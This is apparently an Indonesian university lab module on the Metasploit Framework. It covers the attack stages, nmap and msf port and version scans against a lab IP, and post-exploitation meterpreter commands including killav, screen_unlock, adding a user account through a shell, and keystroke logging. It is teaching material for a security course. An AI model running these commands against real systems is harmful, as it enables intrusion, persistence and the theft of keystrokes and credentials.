Anda di halaman 1dari 8

Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security

By. Team

Network Security
Lab. Assignment: Metasploit Framework (MSF)

Metasploit Architecture
Task 1 Metasploit Aspect
Penjelasan Topologi Metasploit (Penjelasan_Asisten)
Tahapan Melakukan Metasploit (Penjelsan_Asisten)
Step 1 : Reconnaissance/information gathering
Step 2 : vulnerability scan
Step 3 : exploitation/gaining access
Step 4 : maintaining access/backdooring
Step 5 : covering tracks/delete logs

Lengkapi tabel di bawah ini yang merupakan aspek-aspek yang terkait dengan Metasploit,
seperti tabel dibawah ini.
Tabel 1 Metasploit Aspects
Metasploit Aspects Penjelasan Metasploit Aspects
Exploit kode yang menyerang keamanan komputer secara spesifik.
Payload
pembawa exploit yang digunakan untuk mengeksekusi shellcode. Payload kemudian akan
menjalankan shellcode yang dipilih pada target komputer untuk mendapatkan akses
kedalam komputer tujuan (target).
Shellcode kode yang digunakan dengan payload untuk mengeksploitasi komputer target.
Module .
Listener .
Meterpreter .
Aktive Information Gathering .
Passive Information
Gathering
.


Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security
By. Team


Task 2 Pengantar Metasploit
Dibawah ini merupakan tahapan awal dari Metasploit Aspects, yang terdiri dari istilah-istilah
seperti di bawah ini. Jelaskanlah sesuai dengan instruksi yang diberikan.
Jelaskan tahapan-tapan untuk mencari Vulnarebel dengan tujuan untuk exploit system.

....
.......................
Jelaskan Pengertian Threat Modeling

....
.......................

Jelaskan mengenai Vulnerability Analysis
Vulnerability Analysis: suatu system yang menganalisi kelemahan yang
memungkinkan penyerang untuk mengurangi sistem jaminan informasi

Jelaskanlah pengertian Exploitation system.

....
.......................



Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security
By. Team


Task 2 Vulnerabel Scaner
Pada bagian ini praktikan akan diperkenalkan dengan berbagai jenis teknik untuk mencari
Vulnerabel di dalam jaringan, anda bisa menggunakan beberapa tools scaner seperti (nmap,
Nesus, NeXpose, menggunakan MSF) untuk mencari vulnerabel.
Menggunakan Nmap :
root@kejar:~# nmap -sS -Pn 172.16.16.1 (ip victim) atau
Nmap scan report for 172.16.16.1
Host is up (0.0095s latency).
Not shown: 980 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1433/tcp open ms-sql-s
3389/tcp open ms-term-serv
Nmap done: 1 IP address (1 host up) scanned in 20.30 seconds
Dengan menggunakan langkah scaner menggunakan Nmap lakukan ujicoba di
bawah ini
o root@kejar:~# nmap -sS -Pn ip/24 (semua ip)
o root@kejar:~# nmap -sU ip p445
Misal menggunakan msf :
msf > use scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 172.16.16.1
RHOSTS => 172.16.16.1
msf auxiliary(syn) > set THREADS 30
THREADS => 30
msf auxiliary(syn) > run
X [*] TCP OPEN 172.16.16.1:135
[*] TCP OPEN 172.16.16.1:139
[*] TCP OPEN 172.16.16.1:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >
Dengan menggunakan langkah scaner menggunakan msf lakukan ujicoba di bawah
ini
o msf > use scanner/smb/smb_version
o msf > use scanner/mssql/mssql_ping
o msf > use scanner/ssh/ssh_version
o msf > use scanner/ftp/ftp_version
o msf > use auxiliary/scanner/ftp/anonymous




Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security
By. Team



Hasilnya

Menggunakan NMAP melalui Metasploit untuk mencari Vulnerabel menggunakan script --
script=smb-check-vulns ingin tahu lebih dalam silahkan kunjungi
http://www.uninformed.org/?v=2&a=4



Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security
By. Team









Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security
By. Team






Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security
By. Team


Lakukan beberapa Ujicoba di bawah ini, Serta beri analisa masing-masing perintah:
Lakukan proses Download dan Upload dari Victim
meterpreter > screenshot
meterpreter > sysinfo
meterpreter > run vnc
meterpreter > run screen_unlock
meterpreter > run checkvm
meterpreter > run killav
meterpreter > shell X
Process 1426 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator>
C:\Documents and Settings\Administrator>net user kejar labit /add
meterpreter > ps
meterpreter > migrate 1436
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop



Dokumen Laboratorium Teknik Informatika UMM @ 2012 Modul Praktikum Network Security
By. Team

Daftar Pustaka
[1]Syngress Nessus Network Auditing.http://www.offensive-security.com/metasploit-
unleashed/Main_Page
[2]Metasploit Framework User Guide.
http://netsec.cs.northwestern.edu/media/readings/msf_user_guide.pdf
[3]The Metasploit Meterpreter documentation.
http://dev.metasploit.com/documents/meterpreter.pdf

Anda mungkin juga menyukai